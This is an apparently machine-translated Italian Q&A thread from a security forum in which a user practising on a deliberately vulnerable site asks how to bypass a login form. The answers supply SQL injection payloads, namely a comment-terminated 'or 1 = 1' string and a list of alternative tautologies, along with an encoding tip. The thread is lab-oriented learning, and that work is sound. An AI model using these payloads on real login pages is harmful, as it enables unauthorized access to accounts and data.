Ignora la pagina di accesso con SQL injection [chiuso]

-1

Sto utilizzando una pagina Web vulnerabile per praticare gli attacchi OWASP. Nello scenario attuale ho una pagina di accesso che sto cercando di bypassare. Ho provato la suite Burp e i cheat sheet manuali, ma non ho potuto aggirarlo anche se è vulnerabile. Allego uno screenshot della pagina di accesso.

Come faccio a ignorare il login?

    
posta zubair malik 22.10.2017 - 22:11
fonte

2 risposte

1

Controlla la mia risposta qui .

Dall'istruzione sql visualizzata nell'immagine sopra "e" ha la precedenza su "o" , quindi se il valore della password non esiste nel database, il la dichiarazione non restituirà nulla.

Quello che posso suggerire è l'iniezione del simbolo del commento nel campo del nome utente come questo:

 1' or 1 = 1  --
    
risposta data 22.10.2017 - 22:51
fonte
1

nell'immagine sopra, tutta la stringa è stata sfuggita. prova la codifica e la doppia codifica

Alternative Expression of 'or 1 = 1'

OR 'SQLi' = 'SQL'+'i'
OR 'SQLi' > 'S'
or 20 > 1
OR 2 between 3 and 1
OR 'SQLi' = N'SQLi'
1 and 1 = 1
1 || 1 = 1
1 && 1 = 1

Puoi leggere di più qui foglio di test di iniezione sql OWASP

inoltre, esercitati in applicazioni conosciute come WebGoat ha suggerimenti e la soluzione e te lo spiega

    
risposta data 23.10.2017 - 12:08
fonte

Leggi altre domande sui tag